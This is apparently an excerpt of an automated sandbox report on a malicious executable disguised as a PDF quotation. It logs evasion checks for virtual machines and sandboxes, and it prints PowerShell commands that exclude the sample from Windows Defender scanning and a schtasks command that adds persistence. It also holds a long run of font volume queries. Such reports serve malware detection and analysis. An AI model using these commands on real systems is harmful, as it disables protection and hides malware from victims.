                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: UN-Quotation 70000000187366444_PDF.exe PID: 6220, type: MEMORYSTR
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298022373.0000000002641000.00000004.00000800.00020000.00000000.sdmp, UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 6248Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6920Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6764Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6848Thread sleep count: 7498 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6928Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep count: 815 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 4760Thread sleep time: -11990383647911201s >= -30000s
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 4800Thread sleep count: 3332 > 30
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe TID: 4800Thread sleep count: 5748 > 30
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5087
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 661
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7498
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 815
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWindow / User API: threadDelayed 3332
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWindow / User API: threadDelayed 5748
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeThread delayed: delay time: 922337203685477
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.304363401.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: eZUFMybyZvmCI51dXuO
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: UN-Quotation 70000000187366444_PDF.exe, 00000000.00000002.298750065.00000000027A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeCode function: 10_2_06498F98 LdrInitializeThunk,
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\XrgnLg.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XrgnLg" /XML "C:\Users\user\AppData\Local\Temp\tmp25F3.tmp
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess created: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exe VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
